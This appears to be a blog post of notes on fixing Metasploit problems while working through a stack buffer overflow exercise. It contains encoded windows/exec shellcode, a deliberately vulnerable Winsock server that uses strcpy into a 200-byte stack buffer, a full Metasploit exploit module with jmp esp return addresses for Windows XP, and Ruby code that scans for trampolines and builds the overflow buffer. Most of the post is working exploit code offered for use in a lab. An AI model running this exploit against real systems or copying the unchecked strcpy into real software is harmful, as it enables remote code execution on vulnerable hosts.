Notes on Metasploit usage problems and attack test code
Source: Internet  Published by: 荷塘月色淘宝论坛官网  Editor: 程序博客网  Time: 2024/06/16 02:18
1. Testing with the example from failwest's book, running exploit produced the messages below. They mean that 'Space' in 'Payload' is too small: no encoder could produce an encoded payload that fits in Space bytes while avoiding every byte in BadChars. Increasing Space fixes it. The example program further down can be used to reproduce this.
'Payload' =>
{
    'Space' => 300,
    'BadChars' => "\x00",
    'StackAdjustment' => -3500,
},
[-] Exploit failed: No encoders encoded the buffer successfully.
[*] Exploit completed, but no session was created.
2. If the console reports that the module cannot be loaded, the .rb file has a syntax error and must be fixed. The module API is not identical across versions: the rb test code below does not load on the newest version, so bear this in mind when reusing it.
3. Tests were run on Metasploit 3.4.0. The return addresses in targets for XP SP2 and Windows 2000 no longer worked, so [ 'Windows xp sp3', { 'Ret' => 0x7c86467b } ] was used; 0x7c86467b is a jmp esp in kernel32.dll and tested successfully. It was found from the Metasploit console with: msfpescan -f -j esp c:/windows/system32/kernel32.dll. The address only holds for the kernel32.dll build on the test machine (OS version, service pack and language all change it), so rescan the DLL from the target you actually use.
4. Commonly used Metasploit console commands:
use <module name>
set payload XX
set rhost XX
set rport XX
set exitfunc seh
set cmd calc
set payload windows/exec
5. The configured shellcode is 223 bytes, so the Space of 300 above can be lowered to 223. Space is only an upper bound on what the encoder may emit; the encoded size varies with the encoder's key and with options such as EXITFUNC and StackAdjustment, so leave some margin, and keep Space below what the target buffer actually holds: the test server below reads 0x200 bytes per recv(), which leaves 0x200 - 200 - 4 = 308 bytes after the 200-byte filler and the return address.
/*
* windows/exec - 223 bytes
* http://www.metasploit.com
* Encoder: x86/shikata_ga_nai
* EXITFUNC=process, CMD=calc
*/
unsigned char buf[] =
"\xd9\xe5\xbd\x20\x99\xb8\x99\x31\xc9\xd9\x74\x24\xf4\x5e\xb1"
"\x32\x83\xee\xfc\x31\x6e\x13\x03\x4e\x8a\x5a\x6c\x72\x44\x13"
"\x8f\x8a\x95\x44\x19\x6f\xa4\x56\x7d\xe4\x95\x66\xf5\xa8\x15"
"\x0c\x5b\x58\xad\x60\x74\x6f\x06\xce\xa2\x5e\x97\xfe\x6a\x0c"
"\x5b\x60\x17\x4e\x88\x42\x26\x81\xdd\x83\x6f\xff\x2e\xd1\x38"
"\x74\x9c\xc6\x4d\xc8\x1d\xe6\x81\x47\x1d\x90\xa4\x97\xea\x2a"
"\xa6\xc7\x43\x20\xe0\xff\xe8\x6e\xd1\xfe\x3d\x6d\x2d\x49\x49"
"\x46\xc5\x48\x9b\x96\x26\x7b\xe3\x75\x19\xb4\xee\x84\x5d\x72"
"\x11\xf3\x95\x81\xac\x04\x6e\xf8\x6a\x80\x73\x5a\xf8\x32\x50"
"\x5b\x2d\xa4\x13\x57\x9a\xa2\x7c\x7b\x1d\x66\xf7\x87\x96\x89"
"\xd8\x0e\xec\xad\xfc\x4b\xb6\xcc\xa5\x31\x19\xf0\xb6\x9d\xc6"
"\x54\xbc\x0f\x12\xee\x9f\x45\xe5\x62\x9a\x20\xe5\x7c\xa5\x02"
"\x8e\x4d\x2e\xcd\xc9\x51\xe5\xaa\x26\x18\xa4\x9a\xae\xc5\x3c"
"\x9f\xb2\xf5\xea\xe3\xca\x75\x1f\x9b\x28\x65\x6a\x9e\x75\x21"
"\x86\xd2\xe6\xc4\xa8\x41\x06\xcd\xca\x04\x94\x8d\x0c";
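As an added example (not code from the original post), the plain Ruby below reproduces the checks behind notes 1, 3 and 5 so they can be verified outside msfconsole: the payload space implied by the test server's buffers, a scan for jmp esp trampolines of the kind msfpescan -j esp reports, the Space/BadChars check that precedes "No encoders encoded the buffer successfully", and the 'A' * 200 + ret + payload buffer the module sends. The mapped image, the base address 0x7c860000 and the 223-byte filler shellcode are constructed stand-ins; scanning a real DLL also needs the section-header mapping from file offsets to virtual addresses, which msfpescan does for you.

```ruby
# Added example: the arithmetic and checks behind notes 1, 3 and 5, in plain Ruby.
# Assumed layout comes from the C++ test server on this page: recv() into a
# 0x200-byte buffer, strcpy() into msg[200], module sends 'A' * 200 + ret + payload.

RECV_SIZE = 0x200      # sizeof(buf) in the test server
OFFSET    = 200        # 'A' * 200 in the module's exploit method
BADCHARS  = "\x00".b   # strcpy() stops at the first NUL

# Bytes left for the payload after the filler and the 4-byte return address.
# This is the most 'Space' may be set to for this server.
def available_space(recv_size = RECV_SIZE, offset = OFFSET)
  recv_size - offset - 4
end

# True if any byte of data appears in badchars.
def contains_badchars?(data, badchars)
  bad = badchars.bytes
  data.b.bytes.any? { |b| bad.include?(b) }
end

# Trampolines that transfer control to esp, the patterns msfpescan -j esp looks for.
ESP_TRAMPOLINES = {
  "\xff\xe4".b => "jmp esp",
  "\xff\xd4".b => "call esp",
  "\x54\xc3".b => "push esp; ret",
}

# Scan a mapped image (raw bytes at virtual address base) for the patterns above.
# Returns [address, mnemonic] pairs, dropping addresses that contain a bad char,
# since such an address could not survive the strcpy() in the target.
def find_esp_trampolines(image, base, badchars = BADCHARS)
  hits = []
  ESP_TRAMPOLINES.each do |bytes, name|
    pos = image.index(bytes)
    while pos
      addr = base + pos
      hits << [addr, name] unless contains_badchars?([addr].pack('V'), badchars)
      pos = image.index(bytes, pos + 1)
    end
  end
  hits.sort_by(&:first)
end

# The two conditions an encoded payload must meet before the framework accepts it;
# when every encoder fails one of them you get "No encoders encoded the buffer successfully".
# Returns nil when the payload is acceptable, otherwise a description of the problem.
def payload_problem(encoded, space, badchars = BADCHARS)
  return "#{encoded.bytesize} bytes exceeds Space=#{space}" if encoded.bytesize > space
  return "payload contains a bad char" if contains_badchars?(encoded, badchars)
  nil
end

# The module's exploit method as a pure function: filler, return address as a
# little-endian DWORD (pack 'V'), then the payload. Raises if the server's single
# recv() could not take the whole buffer.
def build_buffer(ret, encoded, offset: OFFSET, recv_size: RECV_SIZE)
  buf = ("A" * offset).b + [ret].pack('V') + encoded.b
  raise "buffer is #{buf.bytesize} bytes, recv() only reads #{recv_size}" if buf.bytesize > recv_size
  buf
end

if __FILE__ == $0
  # Constructed stand-in for a mapped kernel32 text section: NOP filler with a
  # jmp esp at offset 0x467b (so the address is the page's 0x7c86467b) and a
  # push esp; ret at 0x100, whose address 0x7c860100 contains a NUL and is rejected.
  image = "\x90".b * 0x5000
  image[0x467b, 2] = "\xff\xe4".b
  image[0x0100, 2] = "\x54\xc3".b
  hits = find_esp_trampolines(image, 0x7c860000)
  hits.each { |addr, name| printf("0x%08x  %s\n", addr, name) }

  shellcode = "\xcc".b * 223   # constructed stand-in for the 223-byte windows/exec
  puts(payload_problem(shellcode, 300) || "payload fits Space=300 with no bad chars")
  buf = build_buffer(hits.first.first, shellcode)
  puts "sending #{buf.bytesize} bytes; #{available_space} bytes were available for the payload"
end
```

Run it once against the constructed image to see the filtering, then replace the image with the bytes of the kernel32.dll section you are targeting and the base with that section's virtual address.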
#include <iostream>
#include <cstring>
#include <cstdlib>
#include <winsock2.h>
#pragma comment(lib, "ws2_32.lib")
using namespace std;

// Intentionally vulnerable: strcpy() copies the received data into a 200-byte
// stack buffer with no length check, so anything past 200 bytes overwrites
// what follows msg on the stack. This is the bug the module below exploits.
void msg_display(char *buf)
{
    char msg[200];
    strcpy(msg, buf);
    cout << "****************" << endl;
    cout << msg << endl;
}

int main()
{
    SOCKET sock, msgsock;
    int length, receive_len;        // signed: recv() reports errors as -1
    struct sockaddr_in sock_server, sock_client;
    char buf[0x200];                // 512 bytes per recv(); this caps the exploit buffer
    WSADATA wsa;
    WSAStartup(MAKEWORD(1, 1), &wsa);
    // SOCKET is unsigned, so "< 0" can never be true; test for INVALID_SOCKET.
    if ((sock = socket(AF_INET, SOCK_STREAM, 0)) == INVALID_SOCKET)
    {
        cout << "Socket Creating Error!" << endl;
        exit(1);
    }
    sock_server.sin_family = AF_INET;
    sock_server.sin_port = htons(7777);          // the port to give "set rport"
    sock_server.sin_addr.S_un.S_addr = INADDR_ANY;
    if (bind(sock, (sockaddr *)&sock_server, sizeof(sock_server)))
    {
        cout << "binding stream socket error!" << endl;
        exit(1);
    }
    cout << "**********************************" << endl;
    cout << " exploit target server 1.0 " << endl;
    cout << "**********************************" << endl;
    listen(sock, 4);
    length = sizeof(struct sockaddr);
    do
    {
        msgsock = accept(sock, (struct sockaddr *)&sock_client, &length);
        if (msgsock == INVALID_SOCKET)          // accept() fails with INVALID_SOCKET, not 1
        {
            cout << "accept error!" << endl;
            break;
        }
        do
        {
            // Zeroing first keeps buf NUL-terminated unless a full 512 bytes arrive.
            memset(buf, 0, sizeof(buf));
            if ((receive_len = recv(msgsock, buf, sizeof(buf), 0)) < 0)
            {
                cout << "reading stream message error!" << endl;
                receive_len = 0;
            }
            msg_display(buf);                   // overflow happens here
        } while (receive_len);
        closesocket(msgsock);
    } while (1);
    closesocket(sock);
    WSACleanup();
    return 0;
}
require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = AverageRanking

  include Msf::Exploit::Remote::Tcp

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'JYH testing Buffer Overflow',
      'Description'    => %q{
        This module exploits the stack buffer overflow in the test server
        above (strcpy into msg[200]); an attacker may be able to execute
        arbitrary code.
      },
      'Author'         => [ 'JYH' ],
      'License'        => MSF_LICENSE,
      'Version'        => '$Revision: 9262 $',
      # Carried over from the module this was copied from; they do not
      # describe the test server on this page.
      'References'     =>
        [
          [ 'CVE', '2008-0226' ],
          [ 'OSVDB', '41195'],
          [ 'BID', '27140' ],
        ],
      'Privileged'     => true,
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread',
        },
      'Payload'        =>
        {
          # Upper bound on the encoded payload. The server's 0x200-byte recv
          # buffer leaves 0x200 - 200 - 4 = 308 bytes after the return address.
          'Space'           => 300,
          'BadChars'        => "\x00",   # strcpy() stops at the first NUL
          'StackAdjustment' => -3500,
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          # Only the XP SP3 entry was verified (note 3); select it with
          # "set TARGET 2". The other two addresses no longer worked.
          [ 'Windows 2000',   { 'Ret' => 0x77F8948B } ],
          [ 'Windows xp sp2', { 'Ret' => 0x7C914393 } ],
          [ 'Windows xp sp3', { 'Ret' => 0x7c86467b } ],   # jmp esp in kernel32.dll
        ],
      'DefaultTarget'  => 1,
      'DisclosureDate' => 'Jan 4 2012'))
  end

  def exploit
    print_status("Trying target #{target.name}...")
    connect
    # 200 bytes fill msg[200]; the DWORD at offset 200 is where the author's
    # build keeps the return address (re-measure the offset for your compiler).
    # It is replaced by the jmp esp trampoline, and the encoded payload follows
    # so that esp points at it when the trampoline runs.
    buf  = 'A' * 200
    buf += [ target.ret ].pack('V')
    buf += payload.encoded
    sock.put(buf)
    handler
    disconnect
  end
end